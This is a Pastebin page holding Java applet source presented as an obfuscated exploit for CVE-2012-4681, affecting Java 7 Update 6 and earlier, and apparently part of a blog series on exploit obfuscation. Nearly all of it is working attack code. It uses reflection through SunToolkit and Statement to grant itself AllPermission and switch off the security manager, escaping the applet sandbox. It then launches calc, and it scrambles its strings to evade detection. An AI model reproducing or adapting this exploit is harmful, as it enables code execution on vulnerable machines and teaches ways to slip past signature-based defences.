Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Java 7 Exploit CVE-2012-4681 obfuscation pt. 3/5
- *
- * Affected product versions:
- * - JDK and JRE 7 Update 6 and before
- *
- * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
- */
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.*;
- import java.security.cert.Certificate;
- import java.lang.reflect.Constructor;
- import java.lang.reflect.Method;
- public class Java extends Applet
- {
- String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
- char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
- char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // file
- String ad = "or",me = "me", aw = "f", kl = "Na"; // forName
- String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // getField
- public void enableSecurity() throws Throwable
- {
- Object ao[] = new Object[2];
- ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
- ao[1] = "a"+"c"+"c";
- Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
- e.execute();
- Field field = (Field)e.getValue();
- Permissions pe = new Permissions();
- pe.add(new AllPermission());
- CodeSource cs = new CodeSource(new URL(new String(file)), new Certificate[0]);
- ProtectionDomain pd = new ProtectionDomain(cs, pe);
- AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
- Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
- field.set(stat, ac);
- stat.execute();
- }
- public void init()
- {
- try
- {
- enableSecurity();
- Runtime.getRuntime().exec("calc");
- }
- catch(Throwable t){}
- }
- private Class GimmeClass(String ps) throws Throwable
- {
- Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
- le.execute();
- return (Class)le.getValue();
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement